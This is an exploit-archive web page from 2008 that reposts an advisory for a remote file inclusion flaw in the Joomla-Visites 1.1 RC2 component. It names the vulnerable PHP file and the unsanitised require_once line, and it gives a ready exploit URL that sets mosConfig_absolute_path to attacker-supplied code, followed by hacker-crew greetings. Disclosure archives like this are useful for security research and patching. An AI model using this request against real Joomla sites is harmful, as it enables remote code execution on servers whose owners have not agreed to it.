SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
Search :
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow ExploitAlert Database

Arrow  Topic :

Joomla Component Joomla-Visites 1.1 RC2 RFI Vulnerability


Arrow  ExploitAlert : 3805
Arrow  Credit : NoGe
Arrow  Date : 27.4.2008

Arrow   Download

Arrow   Plain text version

Arrow  Exploit Code :  

/==========================================================================
=====================================================================\
| |
| [o] Joomla Visites 1.1 RC2 Remote File Inclusion
Vulnerability |
| |
| Software : com_joomla-visites version 1.1 RC2 |
| Vendor : http://www.joomla-visites.net/ |
| Author : NoGe |
| Contact : noge[dot]code[at]gmail[dot]com |
| |

|==========================================================================
=====================================================================|
| |
| [o] Vulnerable file |
| |
|
administrator/components/com_joomla-visites/core/include/myMailer.class.php
|
| |
| require_once $mosConfig_absolute_path .
'/includes/phpmailer/class.phpmailer.php'; |
| |
| |
| |
| [o] Exploit |
| |
|
http://localhost/[path]/administrator/components/com_joomla-visites/core/in
clude/myMailer.class.php?mosConfig_absolute_path=[evilcode] |
| |

|==========================================================================
=====================================================================|
| |
| [o] Greetz |
| |
| all crew #papuahacker #nyubicrew #baliemhackerlink |
| skulmatic olibekas ulga Cungkee nyubi k1tk4t LoCK3R
culun_borneo |
| yooogy H312Y Vrs-hCk Oon_Boy Paman mousekill }^-^{
str0ke |
| http://kapukvalley.net member |
| |

\==========================================================================
=====================================================================/



Alert

Multiple Vendors libc/gdtoa printf(3) Array Overrun

Security Risk High- 2009-05-30

SecurityReason realised new advisory about vulnerabilities libc/gdtoa...

Apache RSS Apache Alert

» Apache Tomcat
   RequestDispatcher
   directory traversal
   vulnerability

» Apache mod_dav / svn
   Remote Denial of Service
   Exploit

» Apache Tomcat Information
   disclosure

» Apache Tomcat User
   enumeration vulnerability
   with FORM authentication

PHP RSS PHP Alert

» PHP 5.2.9 curl safe_mode
   & open_basedir bypass

» PHP 5.2.6 SAPI
   php_getuid() overload

» PHP
   ZipArchive::extractTo()
   Directory Traversal
   Vulnerability

» PHP 5.2.6 dba_replace()
   destroying file

Copyright © SecurityReason.com. All Rights Reserved.